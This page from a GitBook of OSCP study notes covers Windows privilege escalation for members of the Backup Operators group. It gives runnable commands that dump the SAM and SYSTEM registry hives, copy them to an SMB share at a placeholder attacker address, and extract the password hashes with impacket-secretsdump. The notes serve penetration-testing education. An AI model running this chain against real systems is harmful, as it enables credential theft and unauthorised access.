🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • 1. Backup SYSTEM and SAM Files
  • 2. Transfer the Files Using SMB
  • 3. Extracting the hashes
  • 4. Pass The Hash
  1. Windows
  2. Local Privilege Escalation

Backup Operators Group

PreviousToken impersonationNextLateral Movement

Last updated 7 months ago

#The SAM (Security Account Manager) database in Windows stores user account credentials, and the SYSTEM file holds the boot key necessary to decrypt these credentials. The Backup Operators group can bypass file permissions to back up sensitive files like these.

1. Backup SYSTEM and SAM Files

The hklm\sam and hklm\system registry hives correspond to the SAM and SYSTEM files.

reg save hklm\sam C:\temp\sam.backup
reg save hklm\system C:\temp\system.backup

2. Transfer the Files Using SMB

On your attacker machine, set up a simple SMB server with Impacket. 

impacket-smbserver <share_name> <dest_folder_path> -smb2support

From the target machine, copy the backed-up files to the share on the attacker machine.

copy C:\temp\sam.backup \\<attacker_ip>\<share_name>\sam.backup
copy C:\temp\system.backup \\<attacker_ip>\<share_name>\system.backup

3. Extracting the hashes

Now that the SAM and SYSTEM files are transferred to the attacker machine, it's possible extract password hashes from them using impacket-secretsdump.

impacket-secretsdump -sam sam.backup -system system.backup LOCAL

4. Pass The Hash

Pass The hash